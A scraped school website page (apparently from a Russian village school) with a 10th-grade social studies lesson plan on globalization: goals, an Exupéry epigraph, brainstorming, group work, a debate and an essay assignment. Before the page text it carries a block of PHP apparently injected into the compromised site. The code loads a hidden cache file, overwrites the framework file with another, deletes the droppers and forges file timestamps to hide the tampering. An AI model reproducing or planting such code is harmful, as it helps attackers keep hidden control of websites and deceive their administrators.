$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Урок по обществознанию на тему: "Глобализация человеческого общества"

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 209709

На сайте

Сейчас 12 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Урок по обществознанию на тему: "Глобализация человеческого общества"

Урок по обществознанию в 10 классе.

Тема: Глобализация человеческого общества.

Цели:

Закрепить у учащихся представление о понятии глобализация, её проявлениях в различных сферах жизни, её неоднозначных последствиях, познакомить с глобальными проблемами современности;

развивать умения и навыки анализировать, делать выводы, приводить примеры, аргументировать свою точку зрения, работать с текстом;

формировать у учащихся представление о роли России в процессе глобализации и решении глобальных проблем современности

Тип урока: комбинированный урок отработки умений и навыков решения заданий группы «С» ЕГЭ с использованием интерактивных методов.

На доске эпиграф урока: «Мы все заодно, уносимые одной и той же планетой, мы – команда одного корабля» (А. Сент-Экзюпери)

На стенде: газеты «Комсомольская правда», «Аргументы и факты», «Петербургский дневник» от 06.08 2014 года, 11июня 2014 года;

Оборудование:

учебник Кравченко «Обществознание»;

сборники заданий ЕГЭ.

ХОД УРОКА

1. Оргмомент.

2. Проверка домашнего задания;

3. Краткая беседа с учащимися;

– На прошлом уроке мы говорили о многообразии и единстве современного мира. Действительно, современный мир многообразен.
Приведите примеры, доказывающие, что современный мир разнообразен.
Но в то же время при всём многообразии, современный мир един и целостен. 
Как вы думаете, какие факторы способствуют формированию современного мира как единого и целостного? 
(Предполагаемые ответы: транспорт, средства коммуникации, мировая экономика, современные технологии, общие проблемы и т.п.)

– Если раньше экономические, политические, социальные проблемы считались исключительно внутриполитическими, то сейчас они превращаются в общемировые, международно-политические.
Какая тема вот уже несколько недель подряд остаётся одной из главных новостей во всех СМИ всего мира?
(Предполагаемый ответ: финансовой кризис)

– Это действительно так, стоит только почитать заголовки вчерашних газет. 
(Акцент внимания учащихся на стенд со СМИ). «Насколько мировой кризис опасен для России?», 
«Что делать в кризис, чтобы не потерять сбережения, работу, жильё?», «Где «вакцина» от заразы с Запада?»,  «Чем закончится кризисная лихорадка?»
Как вы думаете, последствием какого процесса  является мировой финансовый кризис?
(Один из предполагаемых ответов: глобализация)

4. «Мозговой штурм»

– А что подразумевается под понятием глобальные проблемы современности?

(На основе ответов учащихся на доске рисуется схема, куда вписываются предлагаемые ответы)

Глобализация

– Свяжите эти признаки в одно понятие. Дайте определение понятия глобализация.
(Анализ ответов учащихся и формулировка определения: глобализация – процесс усиления взаимодействия между странами на современном этапе в экономике, политике, культуре и других сферах жизнедеятельности)

5. Ролик включить: "Экология - жизнь"

– Как вы думаете, какое отношение к нашей теме имеет эпиграф сегодняшнего урока «Мы все заодно, уносимые одной и той же планетой, мы – команда одного корабля»
(А. Сент- Экзюпери)?
– Что хотел сказать автор?
(Анализ ответов учащихся)

6. Работа в малых группах

– Глобальные проблемы проявляются в самых разнообразных сферах. Они могут проявляться в экономике, политике, культуре, в области технологий. Давайте посмотрим, каким образом протекают процессы глобализации и как глобальные проблемы проявляются в разных сферах.

Самостоятельная работа в группах (5 минут) Обсуждение итогов работы.

7. Рефлексия

– Какие признаки глобализации и глобальных проблем вы можете наблюдать в нашем селе?
– Каким образом глобализация сказывается на процесс обучения в современной школе?

8.ЗАЙМИ ПОЗИЦИЮ (Дискуссия)

– Широко распространены две совершенно противоположные точки зрения на процесс глобализации. Одна исходит из того, что глобализация является благотворным и прогрессивным в своей основе явлением, которое будет способствовать решению основных проблем, стоящих перед человечеством. Другая, напротив,  акцентирует негативные последствия глобализации.

– Какая из точек зрения представляется вам более адекватно отражающей реальность и почему? Не забывайте, что свою точку зрения всегда необходимо аргументировать.
(Мнения учащихся, обобщение их выводов)

9. Подведение итогов. Зачитать отрывок из статьи А.Д. Сахарова.

– Таким образом, вопрос о последствиях глобализации – спорный вопрос в современном обществознании. Попробуйте дома поразмышлять на эту тему и написать небольшое сочинение-эссе «Глобализация: за и против»,

10. Домашнее задание: эссе на заданную тему: "Глобализация - за или против"